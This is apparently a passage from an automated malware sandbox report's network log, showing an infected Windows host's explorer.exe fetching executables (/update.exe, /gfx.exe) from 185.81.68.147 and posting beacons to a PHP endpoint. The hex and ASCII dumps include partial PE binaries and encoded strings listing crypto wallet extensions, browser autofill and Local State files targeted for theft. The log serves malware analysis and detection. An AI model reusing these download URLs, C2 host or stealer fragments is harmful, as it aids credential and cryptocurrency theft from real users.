                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @<O H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW
                                                                                                                                                                Dec 13, 2024 01:37:17.775044918 CET224INData Raw: 39 00 6c 00 61 00 47 00 78 00 6c 00 5a 00 6d 00 35 00 72 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00
                                                                                                                                                                Data Ascii: 9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW
                                                                                                                                                                Dec 13, 2024 01:37:17.775245905 CET1236INData Raw: 39 00 6d 00 59 00 6d 00 52 00 6b 00 5a 00 32 00 4e 00 70 00 61 00 6d 00 35 00 74 00 61 00 47 00 35 00 6d 00 62 00 6d 00 74 00 6b 00 62 00 6d 00 46 00 68 00 5a 00 48 00 78 00 44 00 62 00 32 00 6c 00 75 00 59 00 6d 00 46 00 7a 00 5a 00 51 00 70 00
                                                                                                                                                                Data Ascii: 9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWht
                                                                                                                                                                Dec 13, 2024 01:37:17.775290966 CET1236INData Raw: 66 00 45 00 31 00 6c 00 64 00 30 00 4e 00 34 00 43 00 6d 00 35 00 68 00 62 00 6d 00 70 00 74 00 5a 00 47 00 74 00 75 00 61 00 47 00 74 00 70 00 62 00 6d 00 6c 00 6d 00 62 00 6d 00 74 00 6e 00 5a 00 47 00 4e 00 6e 00 5a 00 32 00 4e 00 6d 00 62 00
                                                                                                                                                                Data Ascii: fE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybl
                                                                                                                                                                Dec 13, 2024 01:37:17.775302887 CET1236INData Raw: 65 00 6e 00 74 00 56 00 65 00 72 00 73 00 53 00 6b 00 79 00 42 00 6f 00 78 00 69 00 6f 00 6e 00 f4 a7 50 51 41 65 53 7e 17 a4 c3 1a 27 5e 96 3a ab 6b cb 3b 9d 45 f1 1f fa 58 ab ac e3 03 93 4b 30 fa 55 20 76 6d f6 ad cc 76 91 88 02 4c 25 f5 e5 d7
                                                                                                                                                                Data Ascii: entVersSkyBoxionPQAeS~'^:k;EXK0U vmvL%O*5D&bZIg%E]/uLFk_mzRY-t!Xi)IDjuyxX>kq'O f:}Jc1Q3`SEbdwk+HhXpEl{Rs#
                                                                                                                                                                Dec 13, 2024 01:37:17.775430918 CET1236INData Raw: 01 13 8a 6b 3a 91 11 41 4f 67 dc ea 97 f2 cf ce f0 b4 e6 73 96 ac 74 22 e7 ad 35 85 e2 f9 37 e8 1c 75 df 6e 47 f1 1a 71 1d 29 c5 89 6f b7 62 0e aa 18 be 1b fc 56 3e 4b c6 d2 79 20 9a db c0 fe 78 cd 5a f4 1f dd a8 33 88 07 c7 31 b1 12 10 59 27 80
                                                                                                                                                                Data Ascii: k:AOgst"57unGq)obV>Ky xZ31Y'_`QJ-z;M*<Sa+~w&icU!}SELProcessInfoECT * FRProcessInfoOM Win32_PrProcessInfoo
                                                                                                                                                                Dec 13, 2024 01:37:17.775441885 CET1236INData Raw: 89 07 8e 8e a7 33 94 94 b6 2d 9b 9b 22 3c 1e 1e 92 15 87 87 20 c9 e9 e9 49 87 ce ce ff aa 55 55 78 50 28 28 7a a5 df df 8f 03 8c 8c f8 59 a1 a1 80 09 89 89 17 1a 0d 0d da 65 bf bf 31 d7 e6 e6 c6 84 42 42 b8 d0 68 68 c3 82 41 41 b0 29 99 99 77 5a
                                                                                                                                                                Data Ascii: 3-"< IUUxP((zYe1BBhhAA)wZ--{TTm:,AppData\Local\[^\u0020-\u007F]UNKNOWNLocal StateQP~AeS:'^;kEXK 0
                                                                                                                                                                Dec 13, 2024 01:37:17.775464058 CET1236INData Raw: 6f 00 6c 00 75 00 74 00 69 00 6f 00 6e 00 43 00 20 00 00 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 64 00 00 00 00 00 00 00 31 00 2a 00 2e 00 31 00 6c 00 31 00 64 00 31 00 62 00 00 00 00 00 00 00 63 a5 c6 63 7c 84 f8 7c 77 99 ee 77 7b 8d
                                                                                                                                                                Data Ascii: olutionC ProcessId1*.1l1d1bcc||ww{{kkooT0P`0gg+}V+bMvvE@}}YYGGAg_E#Srr[u=&jL&6Zl6?A~?O4\h4Q4
                                                                                                                                                                Dec 13, 2024 01:37:17.775480986 CET776INData Raw: 56 00 30 00 43 00 6d 00 46 00 70 00 61 00 57 00 5a 00 69 00 62 00 6d 00 4a 00 6d 00 62 00 32 00 4a 00 77 00 62 00 57 00 56 00 6c 00 61 00 32 00 6c 00 77 00 61 00 47 00 56 00 6c 00 61 00 57 00 70 00 70 00 62 00 57 00 52 00 77 00 62 00 6d 00 78 00
                                                                                                                                                                Data Ascii: V0CmFpaWZibmJmb2JwbWVla2lwaGVlaWppbWRwbmxwZ3BwfFRlcnJhU3RhdGlvbgpmbm5lZ3BobG9iamRwa2hlY2Fwa2lqamRrZ2NqaGtpYnxIYXJtb255V2Fs
                                                                                                                                                                Dec 13, 2024 01:37:17.775492907 CET1236INData Raw: 39 00 6d 00 61 00 32 00 4e 00 69 00 5a 00 32 00 56 00 72 00 61 00 47 00 56 00 75 00 59 00 6d 00 68 00 38 00 54 00 33 00 68 00 35 00 5a 00 32 00 56 00 75 00 43 00 6d 00 31 00 6e 00 5a 00 6d 00 5a 00 72 00 5a 00 6d 00 4a 00 70 00 5a 00 47 00 6c 00
                                                                                                                                                                Data Ascii: 9ma2NiZ2VraGVuYmh8T3h5Z2VuCm1nZmZrZmJpZGloanBvYW9tYWpsYmdjaGRkbGljZ3BufFBhbGlXYWxsZXQKYW9ka2thZ25hZGNib2JmcGdnZm5qZW9uZ2Vt
                                                                                                                                                                Dec 13, 2024 01:37:17.894916058 CET1236INData Raw: 68 00 6b 00 5a 00 47 00 78 00 70 00 59 00 32 00 64 00 77 00 62 00 6e 00 78 00 51 00 59 00 57 00 78 00 70 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 46 00 76 00 5a 00 47 00 74 00 72 00 59 00 57 00 64 00 75 00 59 00 57 00 52 00
                                                                                                                                                                Data Ascii: hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1u


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                5192.168.2.549719185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:19.177130938 CET235OUTGET /update.exe HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Dec 13, 2024 01:37:20.504733086 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:19 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 05:53:20 GMT
                                                                                                                                                                ETag: "4b400-6290c54e671ba"
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 308224
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 7a 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$a\i%=:%=:%=:,EJ:&=:%=:&=:JKr:-=:JKC:$=:JKD:$=:Rich%=:PEd<zZg":*\4@@@h((@P .text9: `.rdataP>@@.datap@.pdata@X@@.rsrc(\@@.x64`T`
                                                                                                                                                                Dec 13, 2024 01:37:20.504746914 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89
                                                                                                                                                                Data Ascii: HT$HL$H8HL$@?HD$(HT$HHL$(?HD$ HD$ H8HT$HL$H8HL$@7`HD$(HT$HHL$(*`HD$ HD$ H8
                                                                                                                                                                Dec 13, 2024 01:37:20.504849911 CET1236INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 48 48 8d 05 75 3f 00 00 48 89 44 24 30 48 8d 05 71 3f 00 00 48 89 44 24 20 48 8d 05 79 3f 00 00 48 89 05 b6 5f 00 00 48 8d 05 6f 3f 00 00 48 89 05 50 5f 00 00 48 8d 05 79 3f 00 00 48 89 05
                                                                                                                                                                Data Ascii: HHHu?HD$0Hq?HD$ Hy?H_Ho?HP_Hy?H_H?H\_H%@H>_H?H(_H@HB_HD$(H@H@H__H@H@HM_H@H@H;_H@H@
                                                                                                                                                                Dec 13, 2024 01:37:20.504928112 CET1236INData Raw: 48 89 05 05 5e 00 00 48 8d 15 e6 41 00 00 48 8d 0d f7 41 00 00 e8 d2 fa ff ff 48 89 05 f3 5d 00 00 48 8d 15 f4 41 00 00 48 8d 0d 05 42 00 00 e8 b8 fa ff ff 48 89 05 e1 5d 00 00 48 8d 15 02 42 00 00 48 8d 0d 0b 42 00 00 e8 9e fa ff ff 48 89 05 cf
                                                                                                                                                                Data Ascii: H^HAHAH]HAHBH]HBHBH]HBHBH]HBHBjH]HBH%BPH]H"BH+B6H]H(BH1BHu]H.BHGBHc]H
                                                                                                                                                                Dec 13, 2024 01:37:20.504937887 CET1236INData Raw: 48 8d 0d a9 43 00 00 e8 0c f6 ff ff 48 89 05 ed 57 00 00 48 8d 15 a6 43 00 00 48 8d 0d b7 43 00 00 e8 f2 f5 ff ff 48 89 05 db 57 00 00 48 8d 15 b4 43 00 00 48 8d 0d bd 43 00 00 e8 d8 f5 ff ff 48 89 05 c9 57 00 00 48 8d 15 ba 43 00 00 48 8d 0d c3
                                                                                                                                                                Data Ascii: HCHWHCHCHWHCHCHWHCHCH/WHCHCHWHCHCHWHCHCpHVHCHCVHVHCHD<HVHCHD"
                                                                                                                                                                Dec 13, 2024 01:37:20.505074978 CET672INData Raw: 8b 44 24 48 8b 4c 24 44 2b c8 8b c1 8b 4c 24 48 48 8b 54 24 58 48 03 d1 48 8b ca 4c 8d 4c 24 60 44 8b c0 48 8b d1 48 8b 4c 24 38 ff 15 03 53 00 00 85 c0 74 19 83 7c 24 60 00 76 12 8b 44 24 60 8b 4c 24 48 03 c8 8b c1 89 44 24 48 eb b2 48 8b 84 24
                                                                                                                                                                Data Ascii: D$HL$D+L$HHT$XHHLL$`DHHL$8St|$`vD$`L$HD$HH$L$HHL$8uRHL$PjRHD$XHxDD$T$HL$H(DD$8HT$0HBOSH(DD$T$HL$H(DD$8HT$0HBSH(
                                                                                                                                                                Dec 13, 2024 01:37:20.505084991 CET1236INData Raw: 00 00 00 00 48 c7 44 24 30 00 00 00 00 c7 44 24 28 04 00 00 00 c7 44 24 20 00 00 00 00 45 33 c9 45 33 c0 33 d2 48 8d 8c 24 40 01 00 00 ff 15 31 50 00 00 85 c0 75 05 e9 85 07 00 00 48 c7 44 24 30 00 00 00 00 c7 44 24 28 00 00 00 00 c7 44 24 20 03
                                                                                                                                                                Data Ascii: HD$0D$(D$ E3E33H$@1PuHD$0D$(D$ E3AH$@NHD$PH|$Pu>3HL$PlP$$t$uHL$PN$AA03NHD$`H|$`uHL$PdN
                                                                                                                                                                Dec 13, 2024 01:37:20.505099058 CET1236INData Raw: 84 24 f0 00 00 00 48 8b 80 b0 00 00 00 48 89 84 24 60 0a 00 00 c7 84 24 58 0a 00 00 00 00 00 00 8b 84 24 64 0a 00 00 39 84 24 58 0a 00 00 0f 83 df 01 00 00 8b 84 24 58 0a 00 00 8b 8c 24 5c 0a 00 00 03 c8 8b c1 8b c0 48 8b 4c 24 60 48 03 c8 48 8b
                                                                                                                                                                Data Ascii: $HH$`$X$d9$X$X$\HL$`HHH$p$XH$XH$p@H3H$h$X$\HL$`HHH$x$$$$h9$)$XH$
                                                                                                                                                                Dec 13, 2024 01:37:20.505110025 CET1236INData Raw: e8 1f fe ff ff 8b c0 48 8b 4c 24 38 48 03 c8 48 8b c1 48 89 44 24 48 48 8b 54 24 38 48 8b 44 24 48 8b 48 20 e8 fb fd ff ff 8b c0 48 8b 4c 24 38 48 03 c8 48 8b c1 48 89 44 24 28 48 8b 54 24 38 48 8b 44 24 48 8b 48 1c e8 d7 fd ff ff 8b c0 48 8b 4c
                                                                                                                                                                Data Ascii: HL$8HHHD$HHT$8HD$HH HL$8HHHD$(HT$8HD$HHHL$8HHHD$PHT$8HD$HH$HL$8HHHD$@HD$H@D$ D$ L$ L$ HT$8HD$(nHL$8HHHD$XHDHL$XEHtMHT$8HD$HH3
                                                                                                                                                                Dec 13, 2024 01:37:20.505281925 CET1236INData Raw: 43 00 00 48 8b 0d 26 46 00 00 e8 ad 10 00 00 ff 15 bb 42 00 00 4c 8b 84 24 40 02 00 00 33 d2 48 8b c8 ff 15 08 43 00 00 48 c7 84 24 40 02 00 00 00 00 00 00 33 c0 48 81 c4 58 02 00 00 c3 cc cc cc cc cc cc 48 83 ec 48 e8 f7 fd ff ff 85 c0 74 05 c6
                                                                                                                                                                Data Ascii: CH&FBL$@3HCH$@3HXHHtD$0D$0uEX@HD$(D$ E3L33BHD$8HL$8B2HHHL$H83D$ D%CLZEH.Ch
                                                                                                                                                                Dec 13, 2024 01:37:20.624737978 CET1236INData Raw: 8d 15 b6 2f 00 00 48 8d 4c 24 40 e8 08 0a 00 00 85 c0 74 3c 48 8d 0d b9 2f 00 00 e8 88 0e 00 00 0f b6 c0 85 c0 74 08 33 c9 ff 15 95 3c 00 00 e8 4c fd ff ff 33 c0 83 f8 01 74 0d b9 50 c3 00 00 ff 15 2e 3c 00 00 eb ec 33 c9 ff 15 74 3c 00 00 48 8d
                                                                                                                                                                Data Ascii: /HL$@t<H/t3<L3tP.<3t<H/HL$@tAH/7t3D<3tP;3#<4$P9tTHw:uH4/t3;3


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                6192.168.2.549726185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:21.548691034 CET232OUTGET /gfx.exe HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Dec 13, 2024 01:37:22.874183893 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:22 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 07:53:47 GMT
                                                                                                                                                                ETag: "6bc00-6290e03a93110"
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 441344
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8b 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 fa 04 00 00 00 02 00 00 00 00 00 aa a6 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 [TRUNCATED]
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)#,(,/,),,(,-,-j,U%,U,U.,Rich,PELZg@0@FE88@<.textz `.rdataIJ@@.datam`,H@.rsrct@@.relocEFv@B
                                                                                                                                                                Dec 13, 2024 01:37:22.874234915 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 60
                                                                                                                                                                Data Ascii: h`DYhDYj hEdnF6hDYj hEtF5h DYjhETuF5hDYj h$EoF5
                                                                                                                                                                Dec 13, 2024 01:37:22.874361992 CET1236INData Raw: 00 68 e0 d2 44 00 e8 79 93 02 00 59 c3 cc cc cc 6a 14 68 48 d0 45 00 b9 4c 74 46 00 e8 8f 35 02 00 68 40 d3 44 00 e8 59 93 02 00 59 c3 cc cc cc 6a 1c 68 60 d0 45 00 b9 8c 6d 46 00 e8 6f 35 02 00 68 a0 d3 44 00 e8 39 93 02 00 59 c3 cc cc cc 6a 14
                                                                                                                                                                Data Ascii: hDyYjhHELtF5h@DYYjh`EmFo5hD9YjhE$uFO5hDYj hEuF/5h`DYjh{EoF5hDYjh{EmF4h DYjhEnF4hDYjh
                                                                                                                                                                Dec 13, 2024 01:37:22.874454975 CET1236INData Raw: d3 45 00 b9 fc 6c 46 00 e8 cf 30 02 00 68 80 e1 44 00 e8 99 8e 02 00 59 c3 cc cc cc 6a 0c 68 70 d3 45 00 b9 2c 6d 46 00 e8 af 30 02 00 68 e0 e1 44 00 e8 79 8e 02 00 59 c3 cc cc cc 6a 0c 68 80 d3 45 00 b9 c4 6e 46 00 e8 8f 30 02 00 68 40 e2 44 00
                                                                                                                                                                Data Ascii: ElF0hDYjhpE,mF0hDyYjhEnF0h@DYYjhExFo0hD9YjhExFO0hDYjhEuF/0h`DYjhEwF0hDYjhEnF/h D
                                                                                                                                                                Dec 13, 2024 01:37:22.874473095 CET1236INData Raw: 89 02 00 59 c3 cc cc cc 6a 08 68 78 d5 45 00 b9 9c 72 46 00 e8 ef 2b 02 00 68 20 f0 44 00 e8 b9 89 02 00 59 c3 cc cc cc 6a 08 68 84 d5 45 00 b9 bc 76 46 00 e8 cf 2b 02 00 68 80 f0 44 00 e8 99 89 02 00 59 c3 cc cc cc 6a 10 68 90 d5 45 00 b9 34 71
                                                                                                                                                                Data Ascii: YjhxErF+h DYjhEvF+hDYjhE4qF+hDyYjhEwF+h@DYYjhEyFo+hD9YjhEluFO+hDYj@hEoF/+h`DYjhElrF
                                                                                                                                                                Dec 13, 2024 01:37:22.874588966 CET1236INData Raw: e8 2f 27 02 00 68 60 fe 44 00 e8 f9 84 02 00 59 c3 cc cc cc 6a 0c 68 f4 d9 45 00 b9 74 73 46 00 e8 0f 27 02 00 68 c0 fe 44 00 e8 d9 84 02 00 59 c3 cc cc cc 6a 08 68 04 da 45 00 b9 34 6e 46 00 e8 ef 26 02 00 68 20 ff 44 00 e8 b9 84 02 00 59 c3 cc
                                                                                                                                                                Data Ascii: /'h`DYjhEtsF'hDYjhE4nF&h DYjhErF&hDYj4h(EoF&hDyYjh`EkF&h@EYYjhhE\vFo&hE9YjhEoFO&hEY
                                                                                                                                                                Dec 13, 2024 01:37:22.874638081 CET1236INData Raw: 65 e3 02 00 83 c9 ff 83 c4 1c 85 c0 0f 48 c1 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 8d 45 10 50 51 ff 75 0c e8 ad ff ff ff 83 c4 0c 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 5d c3 cc cc cc cc cc cc cc cc 55 8b
                                                                                                                                                                Data Ascii: eH]UMEPQu]UE]U$aF3EUEVUNEQW$EPfM3^9y]UVWFP$EfEPN^]A$EPYI
                                                                                                                                                                Dec 13, 2024 01:37:22.874655962 CET1236INData Raw: 75 e8 6a 02 e8 f3 2f 02 00 ff 75 e0 8b 06 8d 4d b0 51 8b ce ff 50 08 c6 45 fc 01 8d 55 b0 83 7d c4 10 8b 4d c0 0f 43 55 b0 8b 45 dc 8b 75 d8 2b c6 89 4d e0 51 52 3b c8 77 25 83 7d dc 10 8d 04 0e 89 45 d8 8d 45 c8 0f 43 45 c8 03 f0 56 e8 b9 8b 02
                                                                                                                                                                Data Ascii: uj/uMQPEU}MCUEu+MQR;w%}EECEVEEuQM/Ur,MBrI#+RQzMM$E~EfEW}f~fGMCEGEPEEPME
                                                                                                                                                                Dec 13, 2024 01:37:22.874671936 CET1236INData Raw: c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 56 c7 45 fc 00 00 00 00 e8 46 56 02 00 6a 14 56 e8 7f 76 02 00 83 c4 0c 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 a1 24 61 46
                                                                                                                                                                Data Ascii: PEdVEFVjVvMdY^]U$aF3EjEPjhTFEtx}t_d,F;~-hFp=FuhDuhFLpjjhTFhFLFEtMhF3Eo]
                                                                                                                                                                Dec 13, 2024 01:37:22.874826908 CET1000INData Raw: 58 e1 45 00 74 0b 6a 04 56 e8 bf 71 02 00 83 c4 08 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 71 04 85 f6 74 25 57 83 cf ff 8b c7 f0 0f c1 46 04 75 17 8b 06 8b ce ff 10 f0 0f c1 7e 08 4f 75 09 8b 06 8b ce 5f 5e ff 60 04 5f 5e
                                                                                                                                                                Data Ascii: XEtjVq^]Vqt%WFu~Ou_^`_^UQMahEFEPyUVWFP$EfEP~E^]VFtAN+rP#+w#QPpFF
                                                                                                                                                                Dec 13, 2024 01:37:22.994350910 CET1236INData Raw: 00 00 00 c7 46 18 00 00 00 00 8d 46 04 50 e8 a4 4b 02 00 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 e8 aa bd 02 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 56 8b f1 e8 04 fd 01 00 85 c0 75 08 8d 50 01 e8 c8 14
                                                                                                                                                                Data Ascii: FFPKMdY^]UQVuPFPUSM]]VCCCQAU;t-W+KEWsusuV}K_^[]UVWMw


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                7192.168.2.549732185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:24.203330040 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:24.323175907 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:25.665555954 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:24 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                8192.168.2.549739185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:25.891144991 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:26.011365891 CET6OUTData Raw: 48 5e 08 51
